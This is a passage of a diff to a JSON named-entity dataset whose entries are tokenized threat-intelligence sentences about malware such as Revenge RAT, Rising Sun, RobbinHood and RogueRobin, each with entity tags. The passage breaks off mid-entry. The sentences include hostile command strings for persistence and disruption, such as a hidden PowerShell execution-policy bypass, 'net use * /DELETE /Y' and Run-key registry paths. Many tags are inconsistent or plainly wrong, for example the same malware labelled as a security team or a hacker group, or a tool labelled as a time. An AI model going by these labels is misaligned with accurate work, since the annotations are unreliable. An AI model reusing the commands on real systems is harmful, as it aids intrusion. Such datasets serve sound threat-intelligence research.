"O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "ping", + "or", + "traceroute", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "schedules", + "the", + "execution", + "one", + "of", + "its", + "modules", + "by", + "creating", + "a", + "new", + "scheduler", + "task." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "dump", + "the", + "SAM", + "database." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "has", + "a", + "plugin", + "detect", + "security", + "products", + "via", + "active", + "drivers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "obtain", + "the", + "OS", + "version", + "information,", + "computer", + "name,", + "processor", + "architecture,", + "machine", + "role,", + "and", + "OS", + "edition." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "obtain", + "information", + "about", + "network", + "configuration,", + "including", + "the", + "routing", + "table,", + "ARP", + "cache,", + "and", + "DNS", + "cache." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "obtain", + "a", + "list", + "of", + "active", + "connections", + "and", + "open", + "ports." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "can", + "obtain", + "information", + "about", + "the", + "current", + "user." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remsec", + "is", + "capable", + "of", + "using", + "HTTP", + "and", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Responder", + "is", + "used", + "to", + "poison", + "name", + "services", + "to", + "gather", + "hashes", + "and", + "credentials", + "from", + "systems", + "within", + "a", + "local", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Responder", + "captures", + "hashes", + "and", + "credentials", + "that", + "are", + "sent", + "to", + "the", + "system", + "after", + "the", + "name", + "services", + "have", + "been", + "poisoned." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "a", + "plugin", + "for", + "microphone", + "interception." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "used", + "blogpost.com", + "as", + "its", + "primary", + "command", + "and", + "control", + "server", + "during", + "a", + "campaign." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "uses", + "the", + "Forfiles", + "utility", + "to", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "the", + "ability", + "to", + "upload", + "and", + "download", + "files." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "a", + "plugin", + "for", + "keylogging." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "uses", + "mshta.exe", + "to", + "run", + "malicious", + "scripts", + "on", + "the", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "a", + "plugin", + "for", + "credential", + "harvesting." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Purp" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "uses", + "the", + "PowerShell", + "command", + "<code>Reflection.Assembly</code>", + "to", + "load", + "itself", + "into", + "memory", + "to", + "aid", + "in", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "a", + "plugin", + "to", + "perform", + "RDP", + "access." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "schedules", + "tasks", + "to", + "run", + "malicious", + "scripts", + "at", + "different", + "intervals." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "a", + "plugin", + "for", + "screen", + "capture." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "uses", + "Base64", + "to", + "encode", + "information", + "sent", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "collects", + "the", + "CPU", + "information,", + "OS", + "information,", + "and", + "system", + "language." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "collects", + "the", + "IP", + "address", + "and", + "MAC", + "address", + "from", + "the", + "system." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "gathers", + "the", + "username", + "from", + "the", + "system." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "has", + "the", + "ability", + "to", + "access", + "the", + "webcam." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "and", + "run", + "scripts", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Revenge", + "RAT", + "creates", + "a", + "Registry", + "key", + "at", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon\\Shell</code>", + "to", + "survive", + "a", + "system", + "reboot." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "added", + "four", + "additional", + "bytes", + "of", + "data", + "upon", + "launching,", + "then", + "saved", + "the", + "changed", + "version", + "as", + "<code>C:\\ProgramData\\Initech\\Initech.exe</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "encrypted", + "strings", + "with", + "a", + "single", + "byte", + "XOR", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "been", + "executed", + "from", + "malicious", + "Excel", + "or", + "Word", + "documents", + "containing", + "macros." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "created", + "a", + "new", + "registry", + "entry", + "at", + "<code>HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics</code>", + "with", + "a", + "value", + "of", + "<code>C:\\ProgramData\\Initech\\Initech.exe", + "/run</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "been", + "distributed", + "in", + "e-mails", + "with", + "malicious", + "Excel", + "or", + "Word", + "documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "encrypted", + "command", + "and", + "control", + "(C2)", + "communications", + "with", + "a", + "stream", + "cipher." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "the", + "ability", + "to", + "identify", + "the", + "Windows", + "version", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "the", + "ability", + "to", + "identify", + "the", + "IP", + "address", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rifdoor", + "has", + "the", + "ability", + "to", + "identify", + "the", + "username", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "archive", + "data", + "using", + "RC4", + "encryption", + "and", + "Base64", + "encoding", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "variants", + "can", + "use", + "SSL", + "for", + "encrypting", + "C2", + "communications." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "has", + "collected", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "has", + "decrypted", + "itself", + "using", + "a", + "single-byte", + "XOR", + "scheme.", + "Additionally,", + "Rising", + "Sun", + "can", + "decrypt", + "its", + "configuration", + "data", + "at", + "runtime." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Configuration", + "data", + "used", + "by", + "Rising", + "Sun", + "has", + "been", + "encrypted", + "using", + "an", + "RC4", + "stream", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "send", + "data", + "gathered", + "from", + "the", + "infected", + "machine", + "via", + "HTTP", + "POST", + "request", + "to", + "the", + "C2." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "delete", + "files", + "and", + "artifacts", + "it", + "creates." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "enumerate", + "information", + "about", + "files", + "from", + "the", + "infected", + "system,", + "including", + "file", + "size,", + "attributes,", + "creation", + "time,", + "last", + "access", + "time,", + "and", + "write", + "time.", + "Rising", + "Sun", + "can", + "enumerate", + "the", + "compilation", + "timestamp", + "of", + "Windows", + "executable", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "modify", + "file", + "attributes", + "to", + "hide", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "clear", + "a", + "memory", + "blog", + "in", + "the", + "process", + "by", + "overwriting", + "it", + "with", + "junk", + "bytes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "test", + "a", + "connection", + "to", + "a", + "specified", + "network", + "IP", + "address", + "over", + "a", + "specified", + "port", + "number." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "used", + "dynamic", + "API", + "resolutions", + "to", + "various", + "Windows", + "APIs", + "by", + "leveraging", + "`LoadLibrary()`", + "and", + "`GetProcAddress()`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "enumerate", + "all", + "running", + "processes", + "and", + "process", + "information", + "on", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "has", + "identified", + "the", + "OS", + "product", + "name", + "from", + "a", + "compromised", + "host", + "by", + "searching", + "the", + "registry", + "for", + "`SOFTWARE\\MICROSOFT\\Windows", + "NT\\", + "CurrentVersion", + "|", + "ProductName`." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "detect", + "the", + "computer", + "name,", + "operating", + "system,", + "and", + "drive", + "information,", + "including", + "drive", + "type,", + "total", + "number", + "of", + "bytes", + "on", + "disk,", + "total", + "number", + "of", + "free", + "bytes", + "on", + "disk,", + "and", + "name", + "of", + "a", + "specified", + "volume." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "detect", + "network", + "adapter", + "and", + "IP", + "address", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "can", + "detect", + "the", + "username", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rising", + "Sun", + "has", + "executed", + "commands", + "using", + "`cmd.exe", + "/c", + "“<command>", + ">", + "<%temp%>\\AM<random>.", + "tmp”", + "2>&1`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "RobbinHood", + "will", + "search", + "for", + "an", + "RSA", + "encryption", + "key", + "and", + "then", + "perform", + "its", + "encryption", + "process", + "on", + "the", + "system", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RobbinHood", + "will", + "search", + "for", + "Windows", + "services", + "that", + "are", + "associated", + "with", + "antivirus", + "software", + "on", + "the", + "system", + "and", + "kill", + "the", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RobbinHood", + "deletes", + "shadow", + "copies", + "to", + "ensure", + "that", + "all", + "the", + "data", + "cannot", + "be", + "restored", + "easily." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RobbinHood", + "disconnects", + "all", + "network", + "shares", + "from", + "the", + "computer", + "with", + "the", + "command", + "<code>net", + "use", + "*", + "/DELETE", + "/Y</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RobbinHood", + "stops", + "181", + "Windows", + "services", + "on", + "the", + "system", + "before", + "beginning", + "the", + "encryption", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RobbinHood", + "uses", + "cmd.exe", + "on", + "the", + "victim's", + "computer." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "has", + "used", + "Google", + "Drive", + "as", + "a", + "Command", + "and", + "Control", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PowerShell", + "script", + "with", + "the", + "RogueRobin", + "payload", + "was", + "obfuscated", + "using", + "the", + "COMPRESS", + "technique", + "in", + "`Invoke-Obfuscation`." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RogueRobin", + "decodes", + "an", + "embedded", + "executable", + "using", + "base64", + "and", + "decompresses", + "it." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "can", + "save", + "a", + "new", + "file", + "to", + "the", + "system", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "uses", + "a", + "command", + "prompt", + "to", + "run", + "a", + "PowerShell", + "script", + "from", + "Excel.", + "To", + "assist", + "in", + "establishing", + "persistence,", + "RogueRobin", + "creates", + "<code>%APPDATA%\\OneDrive.bat</code>", + "and", + "saves", + "the", + "following", + "string", + "to", + "it:<code>powershell.exe", + "-WindowStyle", + "Hidden", + "-exec", + "bypass", + "-File", + "“%APPDATA%\\OneDrive.ps1”</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "checks", + "the", + "running", + "processes", + "for", + "evidence", + "it", + "may", + "be", + "running", + "in", + "a", + "sandbox", + "environment.", + "It", + "specifically", + "enumerates", + "processes", + "for", + "Wireshark", + "and", + "Sysinternals." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "created", + "a", + "shortcut", + "in", + "the", + "Windows", + "startup", + "folder", + "to", + "launch", + "a", + "PowerShell", + "script", + "each", + "time", + "the", + "user", + "logs", + "in", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "uses", + "regsvr32.exe", + "to", + "run", + "a", + ".sct", + "file", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "has", + "a", + "command", + "named", + "<code>$screenshot</code>", + "that", + "may", + "be", + "responsible", + "for", + "taking", + "screenshots", + "of", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "enumerates", + "running", + "processes", + "to", + "search", + "for", + "Wireshark", + "and", + "Windows", + "Sysinternals", + "suite." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "establishes", + "persistence", + "by", + "creating", + "a", + "shortcut", + "(.LNK", + "file)", + "in", + "the", + "Windows", + "startup", + "folder", + "to", + "run", + "a", + "script", + "each", + "time", + "the", + "user", + "logs", + "in." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "base64", + "encodes", + "strings", + "that", + "are", + "sent", + "to", + "the", + "C2", + "over", + "its", + "DNS", + "tunnel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "uses", + "WMI", + "to", + "check", + "BIOS", + "version", + "for", + "VBOX,", + "bochs,", + "qemu,", + "virtualbox,", + "and", + "vm", + "to", + "check", + "for", + "evidence", + "that", + "the", + "script", + "might", + "be", + "executing", + "within", + "an", + "analysis", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "gathers", + "BIOS", + "versions", + "and", + "manufacturers,", + "the", + "number", + "of", + "CPU", + "cores,", + "the", + "total", + "physical", + "memory,", + "and", + "the", + "computer", + "name." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "gathers", + "the", + "IP", + "address", + "and", + "domain", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "collects", + "the", + "victim’s", + "username", + "and", + "whether", + "that", + "user", + "is", + "an", + "admin." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "uses", + "Windows", + "Script", + "Components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RogueRobin", + "uses", + "various", + "WMI", + "queries", + "to", + "check", + "if", + "the", + "sample", + "is", + "running", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Depending", + "on", + "the", + "Linux", + "distribution,", + "RotaJakiro", + "executes", + "a", + "set", + "of", + "commands", + "to", + "collect", + "device", + "information", + "and", + "sends", + "the", + "collected", + "information", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Depending", + "on", + "the", + "Linux", + "distribution", + "and", + "when", + "executing", + "with", + "root", + "permissions,", + "RotaJakiro", + "may", + "install", + "persistence", + "using", + "a", + "`.conf`", + "file", + "in", + "the", + "`/etc/init/`", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "uses", + "the", + "AES", + "algorithm,", + "bit", + "shifts", + "in", + "a", + "function", + "called", + "`rotate`,", + "and", + "an", + "XOR", + "cipher", + "to", + "decrypt", + "resources", + "required", + "for", + "persistence,", + "process", + "guarding,", + "and", + "file", + "locking.", + "It", + "also", + "performs", + "this", + "same", + "function", + "on", + "encrypted", + "stack", + "strings", + "and", + "the", + "`head`", + "and", + "`key`", + "sections", + "in", + "the", + "network", + "packet", + "structure", + "used", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "sends", + "device", + "and", + "other", + "collected", + "data", + "back", + "to", + "the", + "C2", + "using", + "the", + "established", + "C2", + "channels", + "over", + "TCP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 